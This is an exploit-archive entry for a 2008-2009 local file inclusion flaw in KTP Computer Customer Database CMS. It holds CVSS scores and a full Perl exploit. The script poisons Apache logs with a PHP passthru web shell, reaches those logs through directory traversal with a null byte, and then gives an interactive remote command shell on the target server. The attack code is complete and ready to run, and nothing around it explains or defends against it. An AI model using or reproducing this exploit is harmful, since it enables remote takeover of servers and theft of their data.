KTP Computer Customer Database CMS Local File Inclusion Vulnerability

2009.01.26
Credit: CWH
Risk: High
Local: No
Remote: Yes
CWE: CWE-22


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

#!/usr/bin/perl -w #====================================== # KTPCCD Local File Inclusion Exploit #====================================== # # ,--^----------,--------,-----,-------^--, # | ||||||||| `--------' | O .. CWH Underground Hacking Team .. # `+---------------------------^----------| # `\_,-------, _________________________| # / XXXXXX /`| / # / XXXXXX / `\ / # / XXXXXX /\______( # / XXXXXX / # / XXXXXX / # (________( # `------' # #AUTHOR : CWH Underground #DATE : 30 November 2008 #SITE : cwh.citec.us # # ##################################################### #APPLICATION : KTP Computer Customer Database CMS #VERSION : 1 #DOWNLOAD : http://downloads.sourceforge.net/ktpcomputercust/ktp_build_20081119.zip ###################################################### #Note: magic_quotes_gpc = off #Vulnerability in Local File Inclusion #Wrote Exploit for Local File Inclusion <-> Remote Command Execution ####################################################################################### #Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK ####################################################################################### use LWP::UserAgent; use IO::Socket; use LWP::Simple; $log="../"; @apache=( "../../../../../var/log/httpd/access_log", "../../../../../var/log/httpd/error_log", "../apache/logs/error.log", "../apache/logs/access.log", "../../apache/logs/error.log", "../../apache/logs/access.log", "../../../apache/logs/error.log", "../../../apache/logs/access.log", "../../../../apache/logs/error.log", "../../../../apache/logs/access.log", "../../../../../apache/logs/error.log", "../../../../../apache/logs/access.log", "../logs/error.log", "../logs/access.log", "../../logs/error.log", "../../logs/access.log", "../../../logs/error.log", "../../../logs/access.log", "../../../../logs/error.log", "../../../../logs/access.log", "../../../../../logs/error.log", "../../../../../logs/access.log", "../../../../../etc/httpd/logs/access_log", "../../../../../etc/httpd/logs/access.log", "../../../../../etc/httpd/logs/error_log", "../../../../../etc/httpd/logs/error.log", "../../.. /../../var/www/logs/access_log", "../../../../../var/www/logs/access.log", "../../../../../usr/local/apache/logs/access_log", "../../../../../usr/local/apache/logs/access.log", "../../../../../var/log/apache/access_log", "../../../../../var/log/apache/access.log", "../../../../../var/log/access_log", "../../../../../var/www/logs/error_log", "../../../../../var/www/logs/error.log", "../../../../../usr/local/apache/logs/error_log", "../../../../../usr/local/apache/logs/error.log", "../../../../../var/log/apache/error_log", "../../../../../var/log/apache/error.log", "../../../../../var/log/access_log", "../../../../../var/log/error_log" ); my $sis="$^O";if ($sis eq 'MSWin32') { system("cls"); } else { system("clear"); } print "\n==============================================\n"; print " KTP Computer Customer Database \n"; print " Remote Command Execution Exploit \n"; print " Discovered By CWH Underground \n"; print "==============================================\n"; print " \n"; print " ,--^----------,--------,-----,-------^--, \n"; print " | ||||||||| `--------' | O \n"; print " `+---------------------------^----------| \n"; print " `\_,-------, _________________________| \n"; print " / XXXXXX /`| / \n"; print " / XXXXXX / `\ / \n"; print " / XXXXXX /\______( \n"; print " / XXXXXX / \n"; print " / XXXXXX / .. CWH Underground Hacking Team .. \n"; print " (________( \n"; print " `------' \n"; print " \n"; if (@ARGV < 2) { print "Usage: ./xpl.pl <Host> <Path>\n"; print "Ex. ./xpl.pl www.hackme.com /ktp\n"; } $host=$ARGV[0]; $path=$ARGV[1]; if ( $host =~ /^http:/ ) {$host =~ s/http:\/\///g;} print "\nTrying to Inject the Code...\n"; $CODE="<? passthru(\$_GET[cmd]) ?>"; $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Could not connect to host.\n\n"; print $socket "GET /cwhunderground ".$CODE." HTTP/1.1\r\n"; print $socket "Host: ".$host."\r\n"; print $socket "Connection: close\r\n\r\n"; close($socket); if ( $host !~ /^http:/ ) {$host = "http://" . $host;} foreach $getlog(@apache) { chomp($getlog); $find= $host.$path."/?p=".$getlog."%00"; $xpl = LWP::UserAgent->new() or die "Could not initialize browser\n"; $req = HTTP::Request->new(GET => $find); $res = $xpl->request($req); $info = $res->content; if($info =~ /cwhunderground/) {print "\nSuccessfully injected in $getlog \n";$log=$getlog;} } my $sis="$^O";if ($sis eq 'MSWin32') { print "\n[cmd\@win32]\$ "; } else { print "\n[cmd\@unix]\$ "; } chomp( $cmd = <STDIN> ); while($cmd !~ "exit") { $shell= $host.$path."/?p=".$log."%00&cmd=$cmd"; $xpl = LWP::UserAgent->new() or die "Could not initialize browser\n"; $req = HTTP::Request->new(GET => $shell); $res = $xpl->request($req); $info = $res->content; print "\n$info"; my $sis="$^O";if ($sis eq 'MSWin32') { print "\n[cmd\@win32]\$ "; } else { print "\n[cmd\@unix]\$ "; } chomp( $cmd = <STDIN> ); }

References:

http://www.milw0rm.com/exploits/7304
http://www.frsirt.com/english/advisories/2008/3292
http://secunia.com/advisories/32888


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top